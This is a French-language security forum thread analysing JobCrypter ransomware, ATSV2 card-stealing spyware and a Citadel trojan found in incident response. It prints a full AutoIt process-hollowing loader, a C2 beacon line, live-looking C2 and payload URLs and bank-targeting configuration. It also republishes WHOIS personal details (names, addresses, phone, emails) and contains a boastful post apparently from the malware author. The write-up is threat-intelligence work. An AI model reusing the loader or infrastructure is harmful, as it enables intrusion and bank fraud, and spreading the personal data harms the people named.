JobCrypter & les activités carding de djamel au bled

ѠOOT

JobCrypter & les activités carding de djamel au bled

par ѠOOT »

Si je prends le temps d'aborder le sujet ce dimanche, c'est que je tiens à partager certaines informations, dans les limites des clauses de confidentialité, obtenues en investigations numériques. Ce micro RETEX aidera peut-être un ou deux lecteurs avertis à prendre en considération ces aspects méconnus ( ou volontairement ignorés ) lors de la découverte de rançongiciels chiffreurs en entreprises.

Cette semaine, j'ai été amené à intervenir physiquement sur plusieurs incidents réseaux où des machines avaient été compromises puis infectées par Job Crypter. La préservation de toutes les traces ( sujet déjà abordé dans la section Tech, Tips & Tricks ) et l'analyse du rançongiciel permet d'identifier et d'extraire le nécessaire pour effectuer un déchiffrage.

Contrairement aux propos de l'auteur présumé venu intimider la victime sur le forum de Malekal, même le chiffrage terminé et la clé effacée, il est techniquement possible d'extraire les éléments cryptographiques pour écrire en dix lignes de code ( merci Python Cryptography Toolkit ) un déchiffreur de fichiers.

Exemple du principe..

Code : Tout sélectionner

#!/usr/bin/env python
import hashlib, base64
from Crypto.Cipher import DES3
clef="13371337133713371337"
lock="B75RCHC/3882brKgGhF/UnzPMWXC077I"
print base64.b64decode(DES3.new(hashlib.md5(clef).digest(),DES3.MODE_ECB).decrypt(base64.b64decode(lock)))
On pourrait y passer quelques instants de plus mais là n'est pas l'objectif.

Dans tous les cas observés, les compromissions initiales sont situées sur janvier 2016 et ce n'est que 10 à 15 jours après que les JobCrypter ont été délivrés et exécutés, au début du mois de février 2016. Avant cette période, d'autres codes malveillants ont été utilisés et l'un deux est un programme d'espionnage qui semble avoir été développé par le même auteur.

Image

Ce PE ( 5fc20b27bcc3ada24bce99420d010b6a392c57a8 ) a été compilé depuis Microsoft VC# le lundi 18 janvier 2016 à 03:14:37 et se fait passer pour le composant "svchost.exe" de Microsoft Windows mais ce n'est pas tout... ce code malveillant spécialisé dans les vols de numéros de cartes bancaires est signé numériquement, le certificat a été délivré par feue la société française : SBO INVEST.

Image

L'entreprise du secteur de la finance, dirigée par Sylvain Boisrivaud, a cessée son activité le 2 octobre 2015 mais comme vous le constatez le certificat est valide jusqu'au 3 mai 2016.

Le programme se nomme "ATSV2" : AT (Automated Teller?) S (Scanner/Stealer?) version 2.
On retrouve le même compilateur, les mêmes erreurs et... le même mauvais français.

La chaîne UNICODE "djamel" est harcodée dans le binaire.

Image

Dans les transmissions des ordres au C2, il y a cette portion.. "le bled"

Code : Tout sélectionner

connexion.Send("i||" + this.RegRead("vn") + "||" + this.PC() + "||" + 
this.OsFullName() + "||le bled||" + this.GetAllProcess() + "||" + 
Conversions.ToString(this.VideoInstalled()) + "||" + this.awtitle + 
"||" + smethod_0());
Image

HOST.OPERATEUR.ME ( S15444656.ONLINEHOME-SERVER.INFO )

↘ Domain ID : D16140701-ME
Domain Name : OPERATEUR.ME
Nameservers : A.NS.JOKER.COM
Nameservers : B.NS.JOKER.COM
Nameservers : C.NS.JOKER.COM
Domain Create Date : 13-Jul-2015
Domain Last Updated Date : 11-Sep-2015
Domain Expiration Date : 13-Jul-2017
Created by : CSL GmbH R26-ME (113)

Last Updated : Afilias R54-ME (700001)
Domain Status : CLIENT TRANSFER PROHIBITED
Registrant ID : COME-18845
Registrant Name : costa philippe
Registrant Address : 5 rue louis guegan
Registrant City : pluzunet
Registrant Country : FRANCE
Registrant Postal Code : 22140
Registrant Phone : +33.661452058
Registrant E-mail : costa.philippe@outlook.fr


Le service 87.106.111.99:1216/TCP est toujours actif.
Après avoir posté, le port a changé c'est désormais 87.106.111.99:1217/TCP

Le programme est capable par exemple d'enregistrer les frappes clavier, de repérer des numéros de cartes de crédit, de réaliser des captures d'écrans à intervalles réguliers et suivant la configuration d'enregistrer des séquences vidéos ( ffmpeg -r 12.4 -f image2pipe -i pipe:.bmp -pix_fmt yuv420p -c:v libx264 -an -bufsize 60000k -b:v 1800k -y -threads 2 )

Image

Ci-dessous un exemple de configuration permettant de cibler certaines banques.

→ HKCU\Software

Code : Tout sélectionner

    vn  REG_SZ  "ATS V2 + CC"

    bins        REG_SZ  "4970;4974;4974;4979;4978;4973;5130;5131;5134;4035;4150;4972;4971;5136;5612;
4562;5301;4977;4533;4975;4976;5135;3746;3749;4035;4056;4059;4062;4067;4118;4135;4138;4150;4186;4201;
4205;4533;4556;4556;4558;4561;4654;4662;e-Cart;5295;5163;5294"
    
    pluginwititle  REG_SZ  ""

    we  REG_SZ  "PayPal=Paypal;eCBL=e-Carte Bleue WEB;e-cartebleue=e-Carte Bleue WEB;ersion Nomade -
La Banque Postale=e-Carte Bleue WEB;BNP Net Entreprises=BNP Entreprises;LCL Entreprises=LCL Entrepri
ses;CIC=CIC;Cyberplus=Banque Populaire"

    ve  REG_SZ  "La Banque Postale;LCL;CIC;BNP;AUTH;Société Générale"

    VideoMode   REG_SZ  1
    veTime      REG_SZ  6000
    
Le(s) attaquant(s) se serve(nt) d'entreprises françaises pour se maintenir dans un système ( bindshell ), récupérer des informations ( keylogger ), dérober des identifiants ( stealer ), gagner des richesses ( carding + ransomware ), utiliser des terminaux comme services ( routages / C2 ), se dissimuler ( courriels ), utiliser des certificats ( signatures numériques ),... ce qui contraste forcément avec le message de la rançon : "en veux juste nourrir nos familles"

Dans la grande majorité des cas, les réactions des victimes arrivent trop tard, après apparition des symptômes visibles et des paralysies : messages de prise en otage des fichiers + fichiers illisibles. Les attentes immédiates sont de : stopper l'infection, récupérer les fichiers, sécuriser et relancer l'activité comme avant incident. Et finalement, rares sont les entreprises qui exigent de réelles expertises - c'est bien dommage - elles comprendraient vite que JobCrypter n'est que la cerise sur le gâteau.

to be continued...

Rappel: Plateforme PHAROS
https://www.internet-signalement.gouv.fr/
ѠOOT

Re: JobCrypter & les activités carding de djamel au bled

par ѠOOT »

En grattant un peu sur la période du mois de janvier 2016, j'ai pu remettre
la main sur des fichiers ayant été effacés. L'un d'eux a retenu mon attention.

→ "%tmp%\1\lol.bin"

...
0510h: 6A 62 39 6A 72 72 66 74 78 37 37 73 37 75 77 6E jb9jrrftx77s7uwn
0520h: 6A 6E 69 6C 79 7A 6E 33 72 35 66 79 67 34 73 62 jnilyzn3r5fyg4sb
0530h: 39 31 30 37 36 A3 48 4B BE 98 6C 4A A9 99 4C 53 91076£HK¾˜lJ©™LS
0540h: 0A 86 D6 48 7D 41 55 33 21 45 41 30 36 66 64 D3 .†ÖH}AU3!EA06fdÓ
...


Le fichier contient un bloc de 0x530 + un numérique + l'entête d'un AutoIT.
C'est une compresssion classique en LZSS avec un stream de type EA06.
Une fois le mot de passe trouvé, le script est lisible et déprotégé.

Il a été créé le 20 janvier 2016 à 13:31:58 depuis le profile de
la session Windows C:\Users\larbii\AppData\Local\Temp\...

Je ne vais pas détailler le script, je vais directement aux binaires.

Code : Tout sélectionner

$DATA="0x4D5A..."
DllCall("kernel32.dll", "int", "DeleteFileA", "str", @AutoItExe & ":Zone.Identifier")
If ProcessExists("avgui.exe") Then
	If StringInStr(@ScriptFullPath, "lol2.bin") = 0 Then
		$A = StringMid(FileRead(FileOpen(@AutoItExe, 0)), StringInStr(FileRead(FileOpen(@AutoItExe, 0)), "£HK¾˜lJ©™LS") + StringLen("£HK¾˜lJ©™LS"))
		$B = StringReplace(FileRead(FileOpen(@AutoItExe, 0)), "£HK¾˜lJ©™LS" & $A, "")
		FileDelete(@TempDir & "\up.exe")
		$LLD = FileOpen(@TempDir & "\up.exe", 18)
		FileWrite($LLD, $B)
		FileClose($LLD)
		FileDelete(@TempDir & "\r.txt")
		FileWrite(@TempDir & "\r.txt", @AutoItExe)
		FileCopy(@TempDir & "\lol.bin", @TempDir & "\lol2.bin", 1)
		ShellExecute(@TempDir & "\up.exe", "/AutoIt3ExecuteScript " & @TempDir & "\lol2.bin", @ScriptDir)
		Exit
	EndIf
EndIf
Local $GETPID
$ROT = @AutoItExe
If Not FileExists($ROT) Then
	$ROT = @SystemDir & "\svchost.exe"
EndIf
If ProcessExists("avgui.exe") Then
	If $ROT = @AutoItExe Then $ROT = FileRead(@TempDir & "\r.txt")
EndIf
$GETPID = Y()
FileDelete(@TempDir & "\pid.txt")
FileWrite(@TempDir & "\pid.txt", $GETPID)
Func Y()
	$BBINARYIMAGE = $DATA
	Local $BBINARY = Binary($BBINARYIMAGE)
	Local $TBINARY = DllStructCreate("byte[" & BinaryLen($BBINARY) & "]")
	DllStructSetData($TBINARY, 1, $BBINARY)
	Local $PPOINTER = DllStructGetPtr($TBINARY)
	Local $TSTARTUPINFO = DllStructCreate("dword  cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
	Local $TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
	Local $ACALL = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", $ROT, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($TSTARTUPINFO), "ptr", DllStructGetPtr($TPROCESS_INFORMATION))
	If @error Or Not $ACALL[0] Then
		Return SetError(1, 0, 0)
	EndIf
	Local $HPROCESS = DllStructGetData($TPROCESS_INFORMATION, "Process")
	Local $HTHREAD = DllStructGetData($TPROCESS_INFORMATION, "Thread")
	Local $TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")
	DllStructSetData($TCONTEXT, "ContextFlags", 65538)
	$ACALL = DllCall("kernel32.dll", "int", "GetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))
	If @error Or Not $ACALL[0] Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(2, 0, 0)
	EndIf
	Local $TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $PPOINTER)
	$PPOINTER += DllStructGetData($TIMAGE_DOS_HEADER, "AddressOfNewExeHeader")
	Local $SMAGIC = DllStructGetData($TIMAGE_DOS_HEADER, "Magic")
	If Not ($SMAGIC == "MZ") Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(3, 0, 0)
	EndIf
	Local $TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $PPOINTER)
	$PPOINTER += 4
	If DllStructGetData($TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(4, 0, 0)
	EndIf
	Local $TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $PPOINTER)
	Local $INUMBEROFSECTIONS = DllStructGetData($TIMAGE_FILE_HEADER, "NumberOfSections")
	$PPOINTER += 20
	Local $TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $PPOINTER)
	$PPOINTER += 96
	Local $IMAGIC = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "Magic")
	If $IMAGIC <> 267 Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(5, 0, 0)
	EndIf
	Local $IENTRYPOINTNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint")
	$PPOINTER += 128
	Local $POPTIONALHEADERIMAGEBASENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "ImageBase")
	Local $IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfImage")
	$ACALL = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW)
	If @error Or $ACALL[0] Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(6, 0, 0)
	EndIf
	$ACALL = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW, "dword", $IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64)
	If @error Or Not $ACALL[0] Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(7, 0, 0)
	EndIf
	Local $PREMOTECODE = $ACALL[0]
	Local $PHEADERS_NEW = DllStructGetPtr($TIMAGE_DOS_HEADER)
	Local $IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")
	$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE, "ptr", $PHEADERS_NEW, "dword", $IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0)
	If @error Or Not $ACALL[0] Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(8, 0, 0)
	EndIf
	Local $TIMAGE_SECTION_HEADER
	Local $ISIZEOFRAWDATA, $PPOINTERTORAWDATA
	Local $IVIRTUALADDRESS
	For $I = 1 To $INUMBEROFSECTIONS
		$TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $PPOINTER)
		$ISIZEOFRAWDATA = DllStructGetData($TIMAGE_SECTION_HEADER, "SizeOfRawData")
		$PPOINTERTORAWDATA = DllStructGetPtr($TIMAGE_DOS_HEADER) + DllStructGetData($TIMAGE_SECTION_HEADER, "PointerToRawData")
		$IVIRTUALADDRESS = DllStructGetData($TIMAGE_SECTION_HEADER, "VirtualAddress")
		If $ISIZEOFRAWDATA Then
			$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE + $IVIRTUALADDRESS, "ptr", $PPOINTERTORAWDATA, "dword", $ISIZEOFRAWDATA, "dword*", 0)
			If @error Or Not $ACALL[0] Then
				DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
				Return SetError(9, $I, 0)
			EndIf
		EndIf
		$PPOINTER += 40
	Next
	DllStructSetData($TCONTEXT, "Eax", $PREMOTECODE + $IENTRYPOINTNEW)
	$ACALL = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))
	If @error Or Not $ACALL[0] Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(10, 0, 0)
	EndIf
	$ACALL = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $HTHREAD)
	If @error Or $ACALL[0] = -1 Then
		DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
		Return SetError(11, 0, 0)
	EndIf
	Return DllStructGetData($TPROCESS_INFORMATION, "ProcessId")
EndFunc
Func X()
	Exit
EndFunc
$DATA="0x4D5A..."
Les deux $DATA sont des PE 32-bits :

)) Le premier, écrit en Visual Basic, est packé UPX 3.91 ( 1698b71032b55a294748963917d54880e0919f89 )

CompanyName: Bill
ProductName: Project1
FileVersion: 1.00
InternalName: vbstub
OriginalFilename: vbstub.exe


Image

)) Le deuxième est un Citadel, un cheval de troie personnalisable initialement développé pour pirater des identifiants et des services bancaires en ligne ( 6c77e0ebb6f8144642a4f26127c27048f7669e06 )

Le C2 du Citadel est situé chez eUKhost sur 109.203.100.122:80/TCP

Celui-ci se met à jour en téléchargeant une configuration :
→ http://109.203.100.122/fifo/config.dll ( Wed, 20 Jan 2016 13:12:59 GMT )

L'URL du Control Panel a été ajoutée au CCT de Xylitol, comme il était en ligne, j'en ai profité pour bavarder un peu avec lui. Il m'a conseillé de tester la nouvelle release du décodeur qui fût présenté lors du codeblue.jp de 2013. Cette version envoi du rêve, arigatô You Nakatsuru & merci Xylitol pour l'info ^_^

citadel_decryptor.py -v -d config.dll 410A2831A748A4DC6EAC36504F1E0644.EXE
[*] start to decrypt config.dll
[*] get base config & several params
[*] found base config at RVA:0x00002780, RA:0x00001b80
[*] found login key: C1F20D2340B519056A7D89B7DF4B0FFF
[*] use RC4 key at (base config + 0x0000030a)
[*] found following xor key for AES plus:
[252, 164, 193, 50, 70, 245, 200, 171, 208, 197, 207, 220, 115, 80, 171, 66]
[*] found RC4 salt: 0xD6490B8F
[*] try to unpack
[*] decrypt data using following key:
[67, 138, 196, 17, 83, 130, 186, 60, 99, 2, 54, 44, 145, 166, 60, 148, 159, 51, 30, 37, 63, 185, 223
, 214, 184, 111, 183, 185, 165, 153, 41, 106, 124, 228, 76, 193, 84, 127, 23, 240, 147, 219, 75, 94,
69, 7, 172, 184, 154, 120, 8, 227, 148, 131, 128, 235, 103, 21, 59, 179, 155, 34, 120, 18, 175, 88,
64, 165, 105, 47, 18, 100, 1, 19, 67, 237, 18, 179, 110, 7, 122, 24, 207, 198, 140, 132, 72, 164, 2
49, 173, 107, 8, 135, 108, 153, 128, 203, 96, 209, 41, 107, 3, 188, 125, 40, 231, 226, 176, 139, 77,
217, 243, 28, 109, 250, 170, 188, 229, 143, 234, 23, 205, 159, 196, 46, 202, 135, 10, 221, 172, 205
, 52, 250, 76, 211, 93, 198, 255, 192, 241, 137, 57, 151, 183, 193, 119, 158, 136, 158, 218, 87, 50,
161, 222, 89, 171, 13, 253, 86, 35, 87, 199, 245, 158, 186, 187, 90, 192, 25, 45, 195, 213, 244, 23
6, 44, 144, 240, 152, 47, 112, 38, 89, 162, 57, 60, 12, 36, 247, 210, 81, 212, 45, 254, 167, 216, 61
, 17, 230, 119, 245, 86, 151, 165, 6, 71, 129, 5, 123, 252, 160, 74, 226, 216, 95, 241, 116, 32, 237
, 98, 82, 246, 53, 184, 208, 118, 113, 2, 103, 61, 128, 66, 43, 70, 116, 222, 32, 227, 56, 95, 102,
144, 14, 125, 29, 117, 209, 70, 22, 248, 9, 82, 194, 226, 223, 62, 77]
[*] try to AES+ decryption
[*] use following AES key:
[48, 229, 61, 171, 193, 158, 150, 212, 126, 236, 68, 15, 31, 25, 89, 187]
[*] parse decrypted data... OK
[*] decompress decrypted data
[*] wrote decrypted data[/color][/size]

La configuration est peu personnalisée, assez basic.

=> Liste des 637 sites redirigés vers Google.
Image

=> Configuration du C2 actif
http://109.203.100.122/fifo/file.php|file=soft.exe
http://109.203.100.122/fifo/gate.php
http://109.203.100.122/fifo/file.php

=> Liste des C&C alternatifs
http://s186598balooba125.com/djamel/file.php|file=config.bin
http://baladzabiviongaalkdce.com/xxx/file.php|file=config.bin
http://tenknafabalojsgdhincv.com/xxx/file.php|file=config.bin

On retrouve le djamel de l'ATSV2, de Citadel, derrière JobCrypter.
Ces DNS ne sont pas enregistrés, adeptes du sinkholing, hello .o/

to be continued...
ѠOOT

Re: JobCrypter & les activités carding de djamel au bled

par ѠOOT »

Les autres machines examinées n'ont pas été infectées de la même manière que celle avec l'AutoIT. Les utilisateurs ont été victimes de campagnes par courriels piégés avec fichiers JavaScript en pièces jointes.

Ci-dessous, un JS décodé qui télécharge et exécute la charge.

Image

Échantillon 87560B5E3230895CD563265AAF92A47C178A27AD sur MDB.
+ Rapport d9ab3ec1a22c306aa745336e977e79ba5f16a17c0fdccddbae1f22f5a1cae476 sur VxSteam Sandbox.
#Exposed Botnets : http://www.exposedbotnets.com/2016/02/z ... rance.html

http://placidi.fr/1.exe ( 87.106.229.29 )

* placidi.fr est actif depuis 2008, il semble donc avoir été compromis.
* Le binaire distant a été modifié plusieurs fois au cours des derniers jours.
* L'entête HTTP indique que l'exécutable a été déposé sur l'httpd le 22 février 2016 à 04:59:55 GMT

Le "svchost.exe" est toujours signé mais par une autre entreprise : GRANIFLOR

Image

Le code est assez similaire mais le paramétrage diffère.

Image

L'attaquant prends soin de mettre à jour les infos.
Et de modifier le port au C2 en fonction des campagnes.
→ VictimeName = "SPAM 21/02/2016";
87.106.111.99:1218/TCP


>> Historique : Mai 2015 ( Project35 ) ( TrojanSpy:MSIL/Hoetou.A )
[ Fri May 01 2015 00:08:30 ( DF315C4F845030A9BE7D1488876CC4E7 ) ]

Image
UPDATE.MICROSOFTDOWNLOADING.COM ( 87.106.111.99:35/TCP )


>> Historique : Décembre 2015

[ Sun Dec 20 2015 23:12:38 ( 4E86F05B4F533DD216540A98591FFAC2 ) ]

Image

VictimeName = "Spam Djamel"
213.136.92.111:1216/TCP


>> Historique : Janvier 2016

[ Mon Jan 04 2016 00:36:39 ( DA53262F284B5508D823CFD008D7E861 ) ]

Image

VictimeName = "2 Spam"
213.136.92.111:1216/TCP

[ Mon Jan 04 2016 10:24:57 ( 375EC40796DEAAA161F9F7C9AE5CB76C ) ]

Image

VictimeName = "2 Spam Updated"
213.136.92.111:1216/TCP

[ Mon Jan 11 2016 16:27:20 ( 4E691A11F3EDDEC8267AF8C0201E5EC2 ) ]

Image

VictimeName = "ATS"
87.106.111.99:1216/TCP

[ Mon Jan 18 2016 03:14:37 ( 2435CF6C09FB962D3B0A66EB18F536E0 ) ]
VictimeName = "ATS V2"
87.106.111.99:1216/TCP


>> Historique : Février 2016

[ Tue Feb 02 2016 03:02:06 ( C8C6459705F37D06AB3F1706652B7761 ) ]

Le "svchost.exe" est signé par MAELOU


Image

Image

VictimeName = "BUILD 2.2 UP 1"
87.106.111.99:1216/TCP

[ Mon Feb 08 2016 03:34:58 ( 71E8B3345526632F2D03167A2FAEB681 ) ]

Image

VictimeName = "BUILD 2.2 UP 1"
87.106.111.99:1217/TCP

[ Mon Feb 15 2016 12:12:01 ( 1C9A1A866FF285E4019234851DB19B74 ) ]

Image

VictimeName = "SPAM 16/02/2016";
87.106.111.99:1217/TCP

[ Tue Feb 23 2016 17:09:28 ( 72401D2DFF08FCD189D85E5628886558 ) ]

Image

VictimeName = "V3";
87.106.111.99:1219/TCP

to be continued...
raver2046

Re: JobCrypter & les activités carding de djamel au bled

par raver2046 »

bonjour,

personnellement je suis vivement intéressé par le décryptage des fichiers. Pouvez vous m'aider?
Se sont des .css
Coder

Re: JobCrypter & les activités carding de djamel au bled

par Coder »

Bonsoir,
je suis l'hauteur de ces virus, je peux savoir pourquoi vous vous donner du mâle a suivre les traces de nos applications ?, je veux juste savoir la raison, personnellement je fais ça pour gagner de l'argent, et j'avoue que ça rapporte, et sachez que même si vous scanner sur Virustotal par exemple, et que le virus deviens détecter, il me suffit de le recompiler pour avoir une version 100% indétectable, de mon coté je ne fais pas d'effort la preuve vous avez vue que le virus dérobe les numéros de cartes bancaires automatiquement, et j'ajouterai ceci a vos informations, le virus est capable aussi d'effectuer un Auto Transférer d'un compte bancaire de la victime, vous n'avez pas trouvé ceci sur le Code source du svchost.exe, vue que l'option se charge comme plugin de l’extérieur, comme le gestionnaire des fichiers, et le Process Manager, et la Webcam et tous ce qui vas avec, si vous avez besoin de plus d'informations il suffit de demander, je me ferai une joie de vous aider, avec l'avancement des système de sécurité, même les hackers apprend aussi,
Bien Cordialement.
ѠOOT

Re: JobCrypter & les activités carding de djamel au bled

par ѠOOT »

NEWBOSS2015.COM ( 89.46.104.35 | 62.149.128.72 )

Domain ID: 1986930406_DOMAIN_COM-VRSN
Domain Name: NEWBOSS2015.COM

Created on 2015-12-12 - Expires on 2017-12-12 - Updated on 2015-12-14

Registrant Name: vincent dautriche
Registrant Organization: vincent dautriche
Registrant Street: 9 hameau de gravelin, 9
Registrant City: illies
Registrant Postal Code: 59480
Registrant Country: FRANCE
Registrant Email: takboulilia@gmail.com
→ http://www.newboss2015.com/1.txt

Image

→ http://www.newboss2015.com/code.txt

Image

→ http://www.newboss2015.com/sBuild1.exe DA53262F284B5508D823CFD008D7E861 ( 03 Jan 2016 22:44:47 )

→ http://www.newboss2015.com/update.exe 375EC40796DEAAA161F9F7C9AE5CB76C ( 04 Jan 2016 08:25:23 )

→ http://www.newboss2015.com/2016/sBuild1.exe 4E691A11F3EDDEC8267AF8C0201E5EC2 ( 11 Jan 2016 14:28:13 )

5 noms de domaine ont été enregistrés avec : costa.philippe@outlook.fr
3 noms de domaine résolvent actuellement en 213.136.92.111
4 noms de domaine utilisent l'identité de Costa Philippe
MONDNS.ME ( 213.136.92.111 )

Domain ID: D11728691-ME
Domain Name: MONDNS.ME

Created on 2014-04-01 - Expires on 2017-04-01 - Updated on 2014-05-31

Registrant ID: COME-17511
Registrant Name: costa philippe
Registrant Address: 5 rue louis guegan
Registrant City: pluzunet
Registrant Country: FRANCE
Registrant Postal Code: 22140
TAMADA3S.COM ( 213.136.92.111 )

Domain ID: 1852845382_DOMAIN_COM-VRSN
DOMAIN NAME: TAMADA3S.COM

Created on 2014-04-01 - Expires on 2019-04-01 - Updated on 2016-01-09

Registrant Name: costa philippe
Registrant Address: 5 rue louis guegan
Registrant City: pluzunet
Registrant Country: FRANCE
Registrant Postal Code: 22140
MICROSOFTDOWNLOADING.COM ( 213.136.92.111 )

Domain ID: 1852997103_DOMAIN_COM-VRSN
Domain Name: MICROSOFTDOWNLOADING.COM

Created on 2014-04-02 - Expires on 2018-04-02 - Updated on 2014-04-02

Registrant Name: costa philippe
Registrant Address: 5 rue louis guegan
Registrant City: pluzunet
Registrant Country: FRANCE
Registrant Postal Code: 22140

+ UPDATE.MICROSOFTDOWNLOADING.COM ( 213.136.92.111 | 87.106.111.99 | 87.106.18.150 | 217.160.206.177 )
OPERATEUR.ME ( 213.136.92.111 )

Domain ID: D16140701-ME
Domain Name: OPERATEUR.ME

Created on 2015-07-13 - Expires on 2017-07-13 - Updated on 2015-09-11

Registrant ID: COME-18845
Registrant Name: costa philippe
Registrant Address: 5 rue louis guegan
Registrant City: pluzunet
Registrant Country: FRANCE
Registrant Postal Code: 22140

+ HOST.OPERATEUR.ME ( 87.106.111.99 )
AV-FUCKER.COM ( 213.136.92.111 )

Domain ID: 1951025699_DOMAIN_COM-VRSN
DOMAIN NAME: AV-FUCKER.COM

Created on 2015-08-04 - Expires on 2016-08-04 - Updated on 2016-01-09

Registrant Name: costa philippe
Registrant Address: 5 rue louis guegan
Registrant City: pluzunet
Registrant Country: FRANCE
Registrant Postal Code: 22140
SCAN4CRYPT.COM (?) - expired
ANDROID.SH ( 213.136.92.111 | 82.165.155.223 )
Status : Live
Expiry : 2017-07-13

inetnum: 213.136.80.0 - 213.136.94.255
descr: Contabo GmbH / Giga-Hosting GmbH
name: CONTABO
+ 2 comptes dyndns ( thx @malwarehunterteam )
↘ DJDID.MYFTP.BIZ
↘ WINSYSTEM.MYVNC.COM
87.106.18.150 | 87.106.0.0/16 | DE | 2005-08-10 | ONEANDONE-AS 1&1 Internet AG,DE
87.106.111.99 | 87.106.0.0/16 | DE | 2005-08-10 | ONEANDONE-AS 1&1 Internet AG,DE
89.46.104.35 | 89.46.104.0/21 | IT | 2005-11-29 | ARUBA-ASN Aruba S.p.A.,IT
109.203.100.122 | 109.203.100.0/23 | GB | 2010-03-03 | NODE4-AS Node4 Limited,GB
213.136.92.111 | 213.136.92.0/23 | DE | 2000-02-28 | CONTABO Contabo GmbH,DE
217.160.206.177 | 217.160.0.0/16 | DE | ONEANDONE-AS 1&1 Internet SE, DE


→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:30/TCP
